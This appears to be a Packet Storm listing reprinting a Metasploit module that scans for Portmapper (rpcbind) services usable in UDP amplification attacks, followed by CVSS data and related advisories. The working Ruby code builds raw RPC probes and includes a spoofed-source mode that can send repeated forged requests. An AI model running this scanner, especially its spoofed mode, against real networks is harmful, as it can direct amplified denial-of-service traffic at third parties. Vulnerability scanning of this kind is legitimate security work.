Lucene search
Jay Turla, metasploit.comPACKETSTORM:181210HistorySep 01, 2024 - 12:00 a.m.
Portmapper Amplification Scanner
2024-09-0100:00:00
Jay Turla, metasploit.com
packetstormsecurity.com
27
metasploit
udpscanner
drdos
cve-2013-5211
us-cert
ntp monlist
ddos
portmapper
amplification
attack
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
7.1
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner
include Msf::Auxiliary::DRDoS
def initialize
super(
'Name' => 'Portmapper Amplification Scanner',
'Description' => %q{
This module can be used to discover Portmapper services which can be used in an
amplification DDoS attack against a third party.
},
'Author' => ['xistence <xistence[at]0x90.nl>'],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-017A'],
['URL', 'http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/']
],
)
register_options( [
Opt::RPORT(111),
])
end
def rport
datastore['RPORT']
end
def xid_summary
@xid_summary ||= [Rex::Text::rand_text_numeric(8).to_i].pack('N')
end
def xid_dump
@xid_dump ||= [Rex::Text::rand_text_numeric(8).to_i].pack('N')
end
def xid_metrics
@xid_metrics ||= [Rex::Text::rand_text_numeric(8).to_i].pack('N')
end
def setup
super
# RPC DUMP (Program version: 3) request: rpcinfo -T udp -s <IP>
@portmap_summary = ''
@portmap_summary << xid_summary # Random ID
@portmap_summary << "\x00\x00\x00\x00" # Message Type: 0 (Call)
@portmap_summary << "\x00\x00\x00\x02" # RPC Version: 2
@portmap_summary << "\x00\x01\x86\xa0" # Program: Portmap (10000)
@portmap_summary << "\x00\x00\x00\x03" # Program version: 3
@portmap_summary << "\x00\x00\x00\x04" # Procedure: DUMP (4)
@portmap_summary << "\x00\x00\x00\x00" # Credentials Flavor: AUTH_NULL (0)
@portmap_summary << "\x00\x00\x00\x00" # Credentials Length: 0
@portmap_summary << "\x00\x00\x00\x00" # Verifier Flavor: AUTH_NULL (0)
@portmap_summary << "\x00\x00\x00\x00" # Verifier Length: 0
# RPC DUMP (Program version: 2) request: rpcinfo -T udp -p <IP>
@portmap_dump = ''
@portmap_dump << xid_dump # Random ID
@portmap_dump << "\x00\x00\x00\x00" # Message Type: 0 (Call)
@portmap_dump << "\x00\x00\x00\x02" # RPC Version: 2
@portmap_dump << "\x00\x01\x86\xa0" # Program: Portmap (10000)
@portmap_dump << "\x00\x00\x00\x02" # Program version: 2
@portmap_dump << "\x00\x00\x00\x04" # Procedure: DUMP (4)
@portmap_dump << "\x00\x00\x00\x00" # Credentials Flavor: AUTH_NULL (0)
@portmap_dump << "\x00\x00\x00\x00" # Credentials Length: 0
@portmap_dump << "\x00\x00\x00\x00" # Verifier Flavor: AUTH_NULL (0)
@portmap_dump << "\x00\x00\x00\x00" # Verifier Length: 0
# RPC GETSTAT request: rpcinfo -T udp -m <IP>
@portmap_metrics = ''
@portmap_metrics << xid_metrics # Random ID
@portmap_metrics << "\x00\x00\x00\x00" # Message Type: 0 (Call)
@portmap_metrics << "\x00\x00\x00\x02" # RPC Version: 2
@portmap_metrics << "\x00\x01\x86\xa0" # Program: Portmap (10000)
@portmap_metrics << "\x00\x00\x00\x04" # Program version: 4
@portmap_metrics << "\x00\x00\x00\x0c" # Procedure: GETSTAT (12)
@portmap_metrics << "\x00\x00\x00\x00" # Credentials Flavor: AUTH_NULL (0)
@portmap_metrics << "\x00\x00\x00\x00" # Credentials Length: 0
@portmap_metrics << "\x00\x00\x00\x00" # Verifier Flavor: AUTH_NULL (0)
@portmap_metrics << "\x00\x00\x00\x00" # Verifier Length: 0
end
def scanner_prescan(batch)
print_status("Sending Portmap RPC probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
@results_summary = {}
@results_dump = {}
@results_metrics = {}
end
def scan_host(ip)
if spoofed?
datastore['ScannerRecvWindow'] = 0
scanner_spoof_send(@portmap_summary, ip, rport, datastore['SRCIP'], datastore['NUM_REQUESTS'])
scanner_spoof_send(@portmap_dump, ip, rport, datastore['SRCIP'], datastore['NUM_REQUESTS'])
scanner_spoof_send(@portmap_metrics, ip, rport, datastore['SRCIP'], datastore['NUM_REQUESTS'])
else
scanner_send(@portmap_summary, ip, rport)
scanner_send(@portmap_dump, ip, rport)
scanner_send(@portmap_metrics, ip, rport)
end
end
def scanner_process(data, shost, sport)
if data =~ /#{@xid_summary}\x00\x00\x00\x01/
@results_summary[shost] ||= []
@results_summary[shost] << data
elsif data =~ /#{@xid_metrics}\x00\x00\x00\x01/
@results_metrics[shost] ||= []
@results_metrics[shost] << data
elsif data =~ /#{@xid_dump}\x00\x00\x00\x01/
@results_dump[shost] ||= []
@results_dump[shost] << data
else
vprint_error("Skipping #{data.size}-byte non-Portmap response from #{shost}:#{sport}")
end
end
# Called after the scan block
def scanner_postscan(batch)
@results_summary.keys.each do |k|
response_map_summary = { @portmap_summary => @results_summary[k] }
what = 'Portmap RPC DUMP (Program version: 3) amplification'
report_result(k, what, response_map_summary)
end
@results_dump.keys.each do |k|
response_map_dump = { @portmap_dump => @results_dump[k] }
what = 'Portmap RPC DUMP (Program version: 2) amplification'
report_result(k, what, response_map_dump)
end
@results_metrics.keys.each do |k|
response_map_metrics = { @portmap_summary => @results_metrics[k] }
what = 'Portmap RPC GETSTAT amplification'
report_result(k, what, response_map_metrics)
end
end
def report_result(host, attack, map)
report_service(
host: host,
proto: 'udp',
port: rport,
name: 'portmap'
)
peer = "#{host}:#{rport}"
vulnerable, proof = prove_amplification(map)
if vulnerable
print_good("#{peer} - Vulnerable to #{attack}: #{proof}")
report_vuln(
host: host,
port: rport,
proto: 'udp',
name: attack,
refs: references
)
else
vprint_status("#{peer} - Not vulnerable to #{attack}: #{proof}")
end
end
end
`
Related
checkpoint_advisories
checkpoint_advisories
NTP Servers Monlist Command Denial of Service (CVE-2013-5211)
2014-01-19 00:00:00
securityvulns
securityvulns
ntp traffic amplification
2014-01-14 00:00:00
TA14-013A: NTP Amplification Attacks Using CVE-2013-5211
2014-01-14 00:00:00
ibm
ibm
nessus
nessus
Oracle Linux 7 : ntp (ELSA-2016-3612)
2016-09-13 00:00:00
AIX 6.1 TL 8 : ntp (IV58068)
2014-06-17 00:00:00
AIX 6.1 TL 7 : ntp (IV58413)
2014-06-17 00:00:00
threatpost
threatpost
Volume of NTP Amplification Attacks Getting Louder
2014-04-29 13:03:29
NTP Amplification Blamed for 400 Gbps DDoS Attack
2014-02-11 12:21:35
NTP Amplification Flaw To Blame For Gaming DDoS Attacks
2014-01-14 12:45:33
cert
cert
NTP can be abused to amplify denial-of-service attack traffic
2014-01-10 00:00:00
freebsd
freebsd
ntpd DRDoS / Amplification Attack using ntpdc monlist command
2014-01-01 00:00:00
zdt
zdt
NTP ntpd monlist Query Reflection - Denial of Service
2014-04-29 00:00:00
suse
suse
DDoS reflection attacks in ntp
2014-01-20 17:05:38
exploitpack
exploitpack
NTP ntpd monlist Query Reflection - Denial of Service
2014-04-28 00:00:00
openvas
openvas
Juniper Networks Junos OS NTP Server Amplification Denial of Service Vulnerability
2014-07-31 00:00:00
Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)
2020-03-24 00:00:00
Gentoo Security Advisory GLSA 201401-08
2015-09-29 00:00:00
metasploit
metasploit
NTP Mode 6 REQ_NONCE DRDoS Scanner
2014-08-09 04:00:43
NTP Mode 6 UNSETTRAP DRDoS Scanner
2014-08-09 04:00:43
SSDP ssdp:all M-SEARCH Amplification Scanner
2014-08-26 05:53:14
packetstorm
packetstorm
NTP Amplification Denial Of Service Tool
2014-07-16 00:00:00
NTP Mode 7 GET_RESTRICT DRDoS Scanner
2024-09-01 00:00:00
NTP Clock Variables Disclosure
2024-08-31 00:00:00
oraclelinux
oraclelinux
ntp security update
2016-09-09 00:00:00
ntp security update
2016-09-09 00:00:00
ntp security update
2018-12-19 00:00:00
debiancve
debiancve
CVE-2013-5211
2014-01-02 14:59:03
prion
prion
Security feature bypass
2014-01-02 14:59:00
cve
cve
CVE-2013-5211
2014-01-02 14:59:03
slackware
slackware
ntp
2014-02-13 16:38:35
exploitdb
exploitdb
NTP ntpd monlist Query Reflection - Denial of Service
2014-04-28 00:00:00
checkpoint_security
checkpoint_security
Blocking NTP access on Gaia OS / IPSO OS (CVE-2013-5211)
2014-03-01 22:00:00
ubuntucve
ubuntucve
CVE-2013-5211
2014-01-02 00:00:00
thn
thn
ics
ics
NTP Reflection Attack
2018-09-06 12:00:00
fortinet
fortinet
FortiAnalyzer could potentially be used in NTP amplification attacks
2020-06-22 00:00:00
f5
f5
K15154 : NTP vulnerability CVE-2013-5211
2014-04-10 00:00:00
SOL15154 - NTP vulnerability CVE-2013-5211
2014-04-10 00:00:00
freebsd_advisory
freebsd_advisory
FreeBSD-SA-14:02.ntpd
2014-01-14 00:00:00
gentoo
gentoo
NTP: Traffic amplification
2014-01-16 00:00:00
amazon
amazon
Medium: ntp
2021-09-08 23:35:00
Medium: ntp
2018-05-10 17:01:00
mageia
mageia
Updated ntp packages work around security vulnerability
2014-01-31 20:44:56
aix
aix
nvd
nvd
CVE-2013-5211
2014-01-02 14:59:03
cvelist
cvelist
CVE-2013-5211
2014-01-02 11:00:00
vmware
vmware
VMware vSphere updates to third party libraries
2014-03-11 00:00:00
VMware vSphere updates to third party libraries
2014-03-11 00:00:00
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
7.1
Confidence
Low
Related for PACKETSTORM:181210